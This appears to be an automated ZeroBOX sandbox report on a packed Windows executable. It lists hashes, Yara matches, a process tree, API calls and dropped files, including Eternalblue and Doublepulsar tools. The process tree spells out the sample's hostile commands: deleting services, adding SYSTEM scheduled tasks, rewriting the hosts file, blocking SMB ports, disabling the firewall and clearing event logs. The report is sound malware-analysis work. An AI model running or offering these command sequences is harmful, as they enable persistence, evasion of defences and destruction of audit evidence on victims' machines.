Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 2, 2024, 10:12 a.m.	Sept. 2, 2024, 10:40 a.m.

Size	4.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`d94524a8793610d5291f4748981e9916`
SHA256	`d57565ed07ac50cba505f6399b9c08da796047bb5943a39da3f66d4cb6f32ee5`
CRC32	`70045659`
ssdeep	`98304:LnniMrxazp+78Wftj4puoeuaKhlrH9L7TRZ+ZHJtj/IcikcskwvOC+Ld:Oa0zp+wWftLoeghlpzX+ZHTgZwvkJ`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature ASPack_Zero - ASPack packed file DllRegisterServer_Zero - execute regsvr32.exe IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

c64.exe "C:\Users\test22\AppData\Local\Temp\c64.exe"
2560
- sc.exe sc config lanmanserver start= DISABLED 2>nul
  2656
- net.exe net stop lanmanserver /y
  2612
  - net1.exe C:\Windows\system32\net1 stop lanmanserver /y
    3032
- sc.exe sc delete lanmanserver
  2700
- net.exe net stop mssecsvc2.0
  2760
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
    800
- sc.exe sc delete mssecsvc2.0
  2816
- net.exe net stop mssecsvc2.1
  2872
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
    2216
- sc.exe sc delete mssecsvc2.1
  2936
- net.exe net stop COMSysCts
  2996
  - net1.exe C:\Windows\system32\net1 stop COMSysCts
    3016
- sc.exe sc delete COMSysCts
  812
- net.exe net stop WmiAppSrv
  2136
  - net1.exe C:\Windows\system32\net1 stop WmiAppSrv
    2248
- sc.exe sc delete WmiAppSrv
  2260
- net.exe net stop Bcdefg
  2504
  - net1.exe C:\Windows\system32\net1 stop Bcdefg
    2120
- sc.exe sc delete Bcdefg
  2592
- net.exe net stop WSSDPSRVS
  2756
  - net1.exe C:\Windows\system32\net1 stop WSSDPSRVS
    2940
- sc.exe sc delete SSDPSRVS
  2932
- cmd.exe cmd /c c:\windows\inf\demo1.bat
  3040
  - net.exe net user mm123$ /del
    2228
    - net1.exe C:\Windows\system32\net1 user mm123$ /del
      940
  - net1.exe net1 user mm123$ /del
    2660
  - net.exe net user mm123$ /del
    1880
    - net1.exe C:\Windows\system32\net1 user mm123$ /del
      2776
  - net1.exe net1 user mm123$ /del
    6000
  - net.exe net user mm123$ /del
    6068
    - net1.exe C:\Windows\system32\net1 user mm123$ /del
      6984
  - net1.exe net1 user mm123$ /del
    7044
  - sc.exe sc config Schedule start= auto
    7116
  - sc.exe sc start Schedule
    7108
  - schtasks.exe schtasks /delete /tn AutoKMSK /f
    4596
  - schtasks.exe schtasks /delete /tn "Adobe Flash Player Updaters" /f
    6952
  - schtasks.exe schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
    6896
  - schtasks.exe schtasks /run /tn "AutoKMSK"
    3736
  - schtasks.exe schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f
    5496
  - takeown.exe takeown /f C:\Windows\system32\Drivers\etc\hosts /a
    6688
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    6736
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
    6772
  - attrib.exe attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
    6072
  - attrib.exe attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
    4544
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    6604
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
    6568
  - ipconfig.exe ipconfig /flushdns
    6768
  - sc.exe sc start PolicyAgent
    3068
  - sc.exe sc config PolicyAgent start= AUTO
    3116
  - netsh.exe netsh ipsec static del all
    4580
  - netsh.exe netsh ipsec static add policy name=Aliyun
    7376
  - netsh.exe netsh ipsec static add filterlist name=Allowlist
    3552
  - netsh.exe netsh ipsec static add filterlist name=denylist
    5628
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    6508
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    3648
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    5336
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    5840
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    5420
  - netsh.exe netsh ipsec static add filteraction name=Allow action=permit
    5788
  - netsh.exe netsh ipsec static add filteraction name=deny action=block
    6140
  - netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
    5644
  - netsh.exe netsh ipsec static set policy name=Aliyun assign=y
    6260
  - wevtutil.exe wevtutil cl "windows powershell"
    6244
  - wevtutil.exe wevtutil cl "security"
    5940
  - wevtutil.exe wevtutil cl "system"
    6248
- cmd.exe cmd /c C:\windows\Installer\Fileftps.exe
  1120
  - Fileftps.exe C:\windows\Installer\Fileftps.exe
    2068
    - Fileftp.exe "C:\Program Files\Windowsd\Fileftp.exe"
      2104
      - netsh.exe netsh firewall set opmode mode=disable
        2212
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
  2576

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 2, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 2, 2024, 10:12 a.m.			0	0

Command line console output was observed (50 out of 191 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: DESCRIPTION: Modifies a service entry in the registry and Service Database. USAGE: sc <server> config [service name] <option1> <option2>... OPTIONS: NOTE: The option name includes the equal sign. A space is required between the equal sign and the value. type= <own\|share\|interact\|kernel\|filesys\|rec\|adapt> start= <boot\|system\|auto\|demand\|disabled\|delayed-auto> error= <normal\|severe\|critical\|ignore> binPath= <BinaryPathName> group= <LoadOrderGroup> tag= <yes\|no> depend= <Dependencies(separated by / (forward slash))> obj= <AccountName\|ObjectName> DisplayName= <display name> password= <password> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] DeleteService SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The following services are dependent on the Server service. Stopping the Server service will also stop these services. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: Computer Browser console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The Computer Browser service is stopping console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The Computer Browser service was stopped successfully. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The Server service is stopping console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: The service name is invalid. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: More help is available by typing NET HELPMSG 2185. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: cacls console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Windows\system32\Drivers\etc\hosts /g users:f console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: attrib console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: -s -h -a -r C:\Windows\system32\Drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: /s /q C:\Windows\system32\drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: Deleted file - C:\Windows\system32\drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: 127.0.0.1 localhost console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Windows\system32\drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: attrib console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: +s +h +a +r C:\Windows\system32\Drivers\etc\hosts console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: echo console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:12 a.m.	buffer: cacls console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 2, 2024, 10:12 a.m.		1	1	0

The executable uses a known packer (1 event)

packer

Armadillo v1.71

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

TEXTINCLUDE

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 2, 2024, 10:12 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:12 a.m.	process_identifier: 2576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73392000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2024, 10:12 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73392000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 2, 2024, 10:12 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13314379776 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Foreign language identified in PE resource (50 out of 51 events)

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

C source, ASCII text, with CRLF line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00494c50

size

0x00000151

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

C source, ASCII text, with CRLF line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00494c50

size

0x00000151

name

TEXTINCLUDE

language

LANG_CHINESE

filetype

C source, ASCII text, with CRLF line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00494c50

size

0x00000151

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00495140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00495140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00495140

size

0x000000b4

name

RT_CURSOR

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00495140

size

0x000000b4

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_BITMAP

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x00496848

size

0x00000144

name

RT_MENU

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049b1e8

size

0x00000284

name

RT_MENU

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049b1e8

size

0x00000284

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049c430

size

0x0000018c

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049ce78

size

0x00000024

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

Lotus unknown worksheet or configuration, revision 0x2

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cec4

size

0x00000022

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

Lotus unknown worksheet or configuration, revision 0x2

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cec4

size

0x00000022

name

RT_GROUP_CURSOR

language

LANG_CHINESE

filetype

Lotus unknown worksheet or configuration, revision 0x2

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cec4

size

0x00000022

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cf3c

size

0x00000014

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cf3c

size

0x00000014

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0049cf3c

size

0x00000014

Creates executable files on the filesystem (50 out of 62 events)

file	C:\Program Files\Windowsd\Eternalblue-2.2.0.exe
file	C:\Program Files\Windowsd\etebCore-2.x64.dll
file	C:\Program Files\Windowsd\posh.dll
file	C:\Users\test22\AppData\Local\Temp\tem.vbs
file	C:\Program Files\Windowsd\tibe.dll
file	C:\Program Files\Windowsd\pcla-0.dll
file	C:\Program Files\Windowsd\tucl.dll
file	C:\Program Files\Windowsd\libeay32.dll
file	C:\Program Files\Windowsd\adfw.dll
file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe
file	C:\Program Files\Windowsd\etchCore-1.x64.dll
file	C:\Program Files\Windowsd\ucl.dll
file	C:\Program Files\Windowsd\xdvl-0.dll
file	C:\Program Files\Windowsd\trch.dll
file	C:\Windows\Installer\Fileftps.exe
file	C:\Windows\Installer\free.bat
file	C:\Program Files\Windowsd\pcrecpp-0.dll
file	C:\Program Files\Windowsd\etchCore-0.x86.dll
file	C:\Program Files\Windowsd\exma.dll
file	C:\Program Files\Windowsd\libiconv-2.dll
file	C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.exe
file	C:\Program Files\Windowsd\coli-0.dll
file	C:\Program Files\Windowsd\iconv.dll
file	C:\Program Files\Windowsd\trfo.dll
file	C:\Program Files\Windowsd\cnli-1.dll
file	C:\Program Files\Windowsd\trch-0.dll
file	C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe
file	C:\Program Files\Windowsd\Eternalromance-1.3.0.exe
file	C:\Program Files\Windowsd\riar.dll
file	C:\Program Files\Windowsd\adfw-2.dll
file	C:\Program Files\Windowsd\dmgd-4.dll
file	C:\Program Files\Windowsd\etebCore-2.x86.dll
file	C:\Program Files\Windowsd\etch-0.dll
file	C:\Program Files\Windowsd\trch-1.dll
file	C:\Program Files\Windowsd\tibe-2.dll
file	C:\Program Files\Windowsd\tucl-1.dll
file	C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe
file	C:\Program Files\Windowsd\tibe-1.dll
file	C:\Program Files\Windowsd\riar-2.dll
file	C:\Program Files\Windowsd\crli-0.dll
file	C:\Program Files\Windowsd\etchCore-1.x86.dll
file	C:\Program Files\Windowsd\dmgd-1.dll
file	C:\Program Files\Windowsd\exma-1.dll
file	C:\Program Files\Windowsd\Pkill.dll
file	C:\Program Files\Windowsd\etchCore-0.x64.dll
file	C:\Program Files\Windowsd\Eternalromance-1.4.0.exe
file	C:\Program Files\Windowsd\zlib1.dll
file	C:\Program Files\Windowsd\ssleay32.dll
file	C:\Program Files\Windowsd\cnli-0.dll
file	C:\Program Files\Windowsd\trfo-0.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Sept. 2, 2024, 10:12 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\tem.vbs filepath: C:\Users\test22\AppData\Local\Temp\tem.vbs	1	1	0

Creates a suspicious process (7 events)

cmdline	schtasks /delete /tn "Adobe Flash Player Updaters" /f
cmdline	schtasks /delete /tn AutoKMSK /f
cmdline	schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
cmdline	schtasks /run /tn "AutoKMSK"
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline	schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f
cmdline	wevtutil cl "windows powershell"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\tem.vbs
file	C:\Windows\Installer\Fileftps.exe
file	C:\Program Files\Windowsd\Fileftp.exe
file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\c64.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 2, 2024, 10:12 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe parameters: "C:\windows\Installer\Fileftps.exe" filepath: C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe		0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x003c5000', u'virtual_address': u'0x00094000', u'entropy': 7.96904589584701, u'name': u'.rdata', u'virtual_size': u'0x003c43c4'}

entropy

7.96904589585

description

A section with a high entropy has been found

entropy

0.842059336824

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (12 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Sept. 2, 2024, 10:12 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1

Uses Windows utilities for basic Windows functionality (42 events)

cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
cmdline	net user mm123$ /del
cmdline	sc config Schedule start= auto
cmdline	attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
cmdline	net stop lanmanserver /y
cmdline	net stop mssecsvc2.0
cmdline	net stop mssecsvc2.1
cmdline	sc delete lanmanserver
